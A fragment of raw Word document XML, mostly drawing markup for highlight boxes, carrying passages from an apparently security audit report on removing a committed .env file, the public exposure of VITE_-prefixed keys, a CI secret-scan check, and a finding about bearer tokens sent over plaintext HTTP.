                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751544" y="4638"/>
                                  <a:pt x="752475" y="6890"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135979"/>
                                  <a:pt x="751544" y="138224"/>
                                  <a:pt x="749685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141932"/>
                                  <a:pt x="745580" y="142863"/>
                                  <a:pt x="742950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142863"/>
                                  <a:pt x="4649" y="141932"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="929" y="4638"/>
                                  <a:pt x="2789" y="2778"/>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79" style="width:59.25pt;height:11.25pt;position:absolute;z-index:-2147483523;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:430.43pt;mso-position-vertical-relative:text;margin-top:-1.71448pt;" coordsize="7524,1428">
                <v:shape id="Shape 1765" style="position:absolute;width:7524;height:1428;left:0;top:0;" coordsize="752475,142875" path="m9525,0l742950,0c745580,0,747825,930,749685,2778c751544,4638,752475,6890,752475,9525l752475,133350c752475,135979,751544,138224,749685,140084c747825,141932,745580,142863,742950,142875l9525,142875c6894,142863,4649,141932,2789,140084c929,138224,0,135979,0,133350l0,9525c0,6890,929,4638,2789,2778c4649,930,6894,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git rm --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cached .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas"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gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> extended </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>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gramStart"/>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example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A </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">documented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.example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added, stating plainly that anything prefixed </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VITE_</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inlined</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the public JavaScript bundle</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the non-obvious part, and how a developer who </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">treats </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as private storage publishes an API key to every visitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEA8DC" w14:textId="22C4CDAB" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="0011533D">
      <w:pPr>
        <w:spacing w:after="276"/>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CI secret-scan job asserts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rule exists</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, not merely that the file is currently absent. Checking only the current state would pass again the moment someone re-added it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569720FD" w14:textId="13920EE4" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F7FB"/>
        <w:spacing w:after="253" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="272"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Not fully fixed</w:t>
      </w:r>
      <w:r w:rsidR="00C73B1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NF-5.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The hostnames remain in history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD386F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C73B1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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V-15 · Bearer tokens proxied over plaintext HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542AF009" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="192"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A02:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-319</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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4770E6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="54" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="6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4736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27A0A92B" wp14:editId="5986964F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19442</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27480" name="Group 27480"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="809625" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="809625" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1792" name="Shape 1792"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4638"/>
                                  <a:pt x="809625" y="6890"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="126448"/>
                                  <a:pt x="808695" y="128687"/>
                                  <a:pt x="806835" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132407"/>
                                  <a:pt x="802730" y="133338"/>
                                  <a:pt x="800100" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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80" style="width:63.75pt;height:10.5pt;position:absolute;z-index:-2147483496;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-1.53094pt;" coordsize="8096,1333">
                <v:shape id="Shape 1792" style="position:absolute;width:8096;height:1333;left:0;top:0;" coordsize="809625,133350" path="m9525,0l800100,0c802730,0,804975,930,806835,2791c808695,4638,809625,6890,809625,9525l809625,123825c809625,126448,808695,128687,806835,130547c804975,132407,802730,133338,800100,133350l9525,133350c6895,133338,4650,132407,2790,130547l0,123825l0,9525l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5760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B413DAD" wp14:editId="30E7DBAF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1294507</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19442</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4762500" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27481" name="Group 27481"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4762500" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4762500" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1795" name="Shape 1795"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695325" y="6890"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126448"/>
                                  <a:pt x="694395" y="128687"/>
                                  <a:pt x="692535" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132407"/>
                                  <a:pt x="688430" y="133338"/>
                                  <a:pt x="6858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798" name="Shape 1798"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="857250" y="0"/>
                            <a:ext cx="466725" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="930"/>
                                  <a:pt x="463935" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4638"/>
                                  <a:pt x="466725" y="6890"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="126448"/>
                                  <a:pt x="465795" y="128687"/>
                                  <a:pt x="463935" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="132407"/>
                                  <a:pt x="459830" y="133338"/>
                                  <a:pt x="4572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00" name="Shape 1800"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1323975" y="0"/>
                            <a:ext cx="1685925" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1685925" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1676400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1679030" y="0"/>
                                  <a:pt x="1681275" y="930"/>
                                  <a:pt x="1683135" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1684995" y="4638"/>
                                  <a:pt x="1685924" y="6890"/>
                                  <a:pt x="1685925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1685925" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1685924" y="126448"/>
                                  <a:pt x="1684995" y="128687"/>
                                  <a:pt x="1683135" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1681275" y="132407"/>
                                  <a:pt x="1679030" y="133338"/>
                                  <a:pt x="1676400" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123825"/>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03" name="Shape 1803"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3371850" y="0"/>
                            <a:ext cx="409575" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="409575" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="402680" y="0"/>
                                  <a:pt x="404926" y="930"/>
                                  <a:pt x="406785" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408645" y="4638"/>
                                  <a:pt x="409575" y="6890"/>
                                  <a:pt x="409575" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="409575" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="409575" y="126448"/>
                                  <a:pt x="408645" y="128687"/>
                                  <a:pt x="406785" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="404926" y="132407"/>
                                  <a:pt x="402680" y="133338"/>
                                  <a:pt x="400050" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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06" name="Shape 1806"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4105274" y="0"/>
                            <a:ext cx="514351" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="514351" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="504826" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="507456" y="0"/>
                                  <a:pt x="509701" y="930"/>
                                  <a:pt x="511561" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="513421" y="4638"/>
                                  <a:pt x="514350" y="6890"/>
                                  <a:pt x="514351" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="514351" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="514350" y="126448"/>
                                  <a:pt x="513421" y="128687"/>
                                  <a:pt x="511561" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="509701" y="132407"/>
                                  <a:pt x="507456" y="133338"/>
                                  <a:pt x="504826" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4638"/>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11" name="Shape 1811"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3019425" y="171450"/>
                            <a:ext cx="1743075" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1743075" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1733550" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1736180" y="0"/>
                                  <a:pt x="1738425" y="930"/>
                                  <a:pt x="1740285" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1742144" y="4651"/>
                                  <a:pt x="1743074" y="6890"/>
                                  <a:pt x="1743075" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1743075" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1743074" y="126448"/>
                                  <a:pt x="1742144" y="128687"/>
                                  <a:pt x="1740285" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1738425" y="132407"/>
                                  <a:pt x="1736180" y="133338"/>
                                  <a:pt x="1733550" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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81" style="width:375pt;height:24pt;position:absolute;z-index:-2147483487;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:101.93pt;mso-position-vertical-relative:text;margin-top:-1.53094pt;" coordsize="47625,3048">
                <v:shape id="Shape 1795" style="position:absolute;width:6953;height:1333;left:0;top:0;" coordsize="695325,133350" path="m9525,0l685800,0c688430,0,690675,930,692535,2791c694395,4638,695325,6890,695325,9525l695325,123825c695325,126448,694395,128687,692535,130547c690675,132407,688430,133338,685800,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4638,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1798" style="position:absolute;width:4667;height:1333;left:8572;top:0;" coordsize="466725,133350" path="m9525,0l457200,0c459830,0,462075,930,463935,2791c465795,4638,466725,6890,466725,9525l466725,123825c466725,126448,465795,128687,463935,130547c462075,132407,459830,133338,457200,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4638,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1800" style="position:absolute;width:16859;height:1333;left:13239;top:0;" coordsize="1685925,133350" path="m9525,0l1676400,0c1679030,0,1681275,930,1683135,2791c1684995,4638,1685924,6890,1685925,9525l1685925,123825c1685924,126448,1684995,128687,1683135,130547c1681275,132407,1679030,133338,1676400,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4638,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1803" style="position:absolute;width:4095;height:1333;left:33718;top:0;" coordsize="409575,133350" path="m9525,0l400050,0c402680,0,404926,930,406785,2791c408645,4638,409575,6890,409575,9525l409575,123825c409575,126448,408645,128687,406785,130547c404926,132407,402680,133338,400050,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4638,2790,2791c4650,930,6895,0,9525,0x">
